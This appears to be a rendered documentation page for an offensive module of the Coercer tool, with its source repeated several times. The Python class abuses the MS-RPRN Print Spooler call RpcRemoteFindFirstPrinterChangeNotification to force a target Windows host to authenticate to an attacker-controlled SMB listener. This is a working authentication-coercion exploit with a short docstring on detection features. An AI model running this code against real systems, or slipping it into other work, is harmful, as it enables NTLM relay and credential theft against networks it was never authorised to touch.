coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotification

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : RpcRemoteFindFirstPrinterChangeNotification.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 15 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from impacket.dcerpc.v5 import rprn
10from impacket.dcerpc.v5.dtypes import NULL
11
12
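class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)

    Method found by:
     -

    From a monitoring standpoint the distinguishing features of this method are the
    ones declared on the class below: opnum 62 of the MS-RPRN interface, reached over
    the ``\\PIPE\\spoolss`` named pipe or the TCP endpoint bound to the interface UUID
    in ``access``, with the ``pszLocalMachine`` argument carrying the listener UNC path.
    A host on which the Print Spooler RPC interface is not reachable over those
    endpoints cannot be coerced by this method.
    """

    # Path templates the framework renders into self.path; "{{listener}}" is the
    # placeholder for the listener host.  Only an SMB UNC path is offered here.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00')
    ]

    # Transports over which the MS-RPRN interface is bound.
    # NOTE(review): the first key is spelled "ncan_np" (not "ncacn_np"); it is a
    # framework-facing key, so it is kept as-is -- confirm against the dispatcher.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN"
    }

    # The single argument that carries the attacker-supplied UNC path.
    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotification",
        "opnum": 62,
        "vulnerable_arguments": ["pszLocalMachine"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Issue the RpcRemoteFindFirstPrinterChangeNotification call over an open DCE/RPC session.

        Args:
            dcerpc_session: a bound DCE/RPC session; ``None`` means ``connect()`` was never called.
            target: host name or address of the machine whose print server is opened.

        Returns:
            ``""`` when the request was sent without raising, the caught ``Exception``
            object when any step failed, and ``None`` when ``dcerpc_session`` is ``None``.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        hPrinter = None
        try:
            # Open a handle on the remote print server; the notification request
            # below is registered against that handle.
            resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
            hPrinter = resp['pHandle']
            request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
            request['hPrinter'] = hPrinter
            request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
            request['fdwOptions'] = 0x00000000
            # self.path is presumably the UNC path rendered from exploit_paths by
            # the framework -- confirm against MSPROTOCOLRPCCALL.
            request['pszLocalMachine'] = self.path
            request['dwPrinterLocal'] = 0
            request['cbBuffer'] = NULL
            request['pBuffer'] = NULL
            # The response is not inspected: "sent without raising" is the success signal.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Callers inspect the returned exception object; nothing is re-raised here.
            return err
        finally:
            # The printer handle used to stay open on the target for the life of the
            # session; release it so repeated triggers do not accumulate server-side handles.
            if hPrinter is not None:
                try:
                    rprn.hRpcClosePrinter(dcerpc_session, hPrinter)
                except Exception:
                    # Best-effort cleanup: a failed close must not mask the result above.
                    pass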
class RpcRemoteFindFirstPrinterChangeNotification(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
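class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)

    Method found by:
     -

    From a monitoring standpoint the distinguishing features of this method are the
    ones declared on the class below: opnum 62 of the MS-RPRN interface, reached over
    the ``\\PIPE\\spoolss`` named pipe or the TCP endpoint bound to the interface UUID
    in ``access``, with the ``pszLocalMachine`` argument carrying the listener UNC path.
    A host on which the Print Spooler RPC interface is not reachable over those
    endpoints cannot be coerced by this method.
    """

    # Path templates the framework renders into self.path; "{{listener}}" is the
    # placeholder for the listener host.  Only an SMB UNC path is offered here.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00')
    ]

    # Transports over which the MS-RPRN interface is bound.
    # NOTE(review): the first key is spelled "ncan_np" (not "ncacn_np"); it is a
    # framework-facing key, so it is kept as-is -- confirm against the dispatcher.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN"
    }

    # The single argument that carries the attacker-supplied UNC path.
    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotification",
        "opnum": 62,
        "vulnerable_arguments": ["pszLocalMachine"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Issue the RpcRemoteFindFirstPrinterChangeNotification call over an open DCE/RPC session.

        Args:
            dcerpc_session: a bound DCE/RPC session; ``None`` means ``connect()`` was never called.
            target: host name or address of the machine whose print server is opened.

        Returns:
            ``""`` when the request was sent without raising, the caught ``Exception``
            object when any step failed, and ``None`` when ``dcerpc_session`` is ``None``.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        hPrinter = None
        try:
            # Open a handle on the remote print server; the notification request
            # below is registered against that handle.
            resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
            hPrinter = resp['pHandle']
            request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
            request['hPrinter'] = hPrinter
            request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
            request['fdwOptions'] = 0x00000000
            # self.path is presumably the UNC path rendered from exploit_paths by
            # the framework -- confirm against MSPROTOCOLRPCCALL.
            request['pszLocalMachine'] = self.path
            request['dwPrinterLocal'] = 0
            request['cbBuffer'] = NULL
            request['pBuffer'] = NULL
            # The response is not inspected: "sent without raising" is the success signal.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Callers inspect the returned exception object; nothing is re-raised here.
            return err
        finally:
            # The printer handle used to stay open on the target for the life of the
            # session; release it so repeated triggers do not accumulate server-side handles.
            if hPrinter is not None:
                try:
                    rprn.hRpcClosePrinter(dcerpc_session, hPrinter)
                except Exception:
                    # Best-effort cleanup: a failed close must not mask the result above.
                    pass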

Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)

Method found by: -

exploit_paths = [('smb', '\\\\{{listener}}\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\spoolss', 'uuid': '12345678-1234-abcd-ef00-0123456789ab', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': '12345678-1234-ABCD-EF00-0123456789AB', 'version': '1.0'}]}
protocol = {'longname': '[MS-RPRN]: Print System Remote Protocol', 'shortname': 'MS-RPRN'}
function = {'name': 'RpcRemoteFindFirstPrinterChangeNotification', 'opnum': 62, 'vulnerable_arguments': ['pszLocalMachine']}
def trigger(self, dcerpc_session, target):
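    def trigger(self, dcerpc_session, target):
        """
        Issue the RpcRemoteFindFirstPrinterChangeNotification call over an open DCE/RPC session.

        Args:
            dcerpc_session: a bound DCE/RPC session; ``None`` means ``connect()`` was never called.
            target: host name or address of the machine whose print server is opened.

        Returns:
            ``""`` when the request was sent without raising, the caught ``Exception``
            object when any step failed, and ``None`` when ``dcerpc_session`` is ``None``.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        hPrinter = None
        try:
            # Open a handle on the remote print server; the notification request
            # below is registered against that handle.
            resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
            hPrinter = resp['pHandle']
            request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
            request['hPrinter'] = hPrinter
            request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
            request['fdwOptions'] = 0x00000000
            # self.path is presumably the UNC path rendered from exploit_paths by
            # the framework -- confirm against MSPROTOCOLRPCCALL.
            request['pszLocalMachine'] = self.path
            request['dwPrinterLocal'] = 0
            request['cbBuffer'] = NULL
            request['pBuffer'] = NULL
            # The response is not inspected: "sent without raising" is the success signal.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Callers inspect the returned exception object; nothing is re-raised here.
            return err
        finally:
            # The printer handle used to stay open on the target for the life of the
            # session; release it so repeated triggers do not accumulate server-side handles.
            if hPrinter is not None:
                try:
                    rprn.hRpcClosePrinter(dcerpc_session, hPrinter)
                except Exception:
                    # Best-effort cleanup: a failed close must not mask the result above.
                    pass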